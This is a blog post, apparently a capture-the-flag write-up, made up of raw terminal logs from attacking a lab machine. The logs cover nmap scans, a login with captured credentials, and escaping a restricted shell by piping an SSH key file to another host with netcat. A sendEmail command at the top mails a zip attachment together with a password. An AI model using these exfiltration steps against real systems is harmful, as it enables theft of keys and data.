Friday, February 11, 2022

Blizzard CTF - part II

 
sendEmail -f "services@lethallab.com" -t admin@lethallab.com -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: hacker" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

root@kali2:~# cat p@5\$w0rd.txt
blizzard{RightOnTarget}

User: Tracer
Pass: RightOnTarget

root@kali2:~# nmap --script=dns-service-discovery -p 53 10.0.2.33

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:35 PST
Nmap scan report for 10.0.2.33
Host is up (0.00039s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
root@kali2:~# nmap --script=dns-service-discovery -p 53 10.0.2.0/24

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:35 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.33
Host is up (0.00044s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.80
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.81
Host is up (0.00050s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.92
Host is up (0.00048s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.128
Host is up (0.00043s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.163
Host is up (0.00053s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.168
Host is up (0.00029s latency).
PORT   STATE  SERVICE
53/tcp closed domain

Nmap scan report for 10.0.2.203
Host is up (0.00044s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.204
Host is up (0.00047s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 256 IP addresses (10 hosts up) scanned in 4.06 seconds
 

root@kali2:~# nmap --dns-server -sL 10.0.2.33

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:37 PST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.0.2.33
Host is up (0.00047s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
4848/tcp  open  appserv-http
12345/tcp open  netbus

Nmap done: 1 IP address (1 host up) scanned in 4.41 seconds
root@kali2:~# ssh Tracer@10.0.2.33
Tracer@10.0.2.33's password:
Permission denied, please try again.
Tracer@10.0.2.33's password:

[1]+  Stopped                 ssh Tracer@10.0.2.33

root@kali2:~# ssh tracer@10.0.2.33
tracer@10.0.2.33's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-97-generic x86_64)

Last login: Sun Nov  5 15:36:47 2017 from 10.0.4.20
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
tracer:~$ ls
sombra_id_rsa  sombra_id_rsa.pub
tracer:~$ cat sombra_id_rsa.pub
*** forbidden command: cat
tracer:~$ nc 10.0.4.3 1234 < sombra_id_rsa.pub
tracer:~$ Write failed: Broken pipe
root@kali2:~#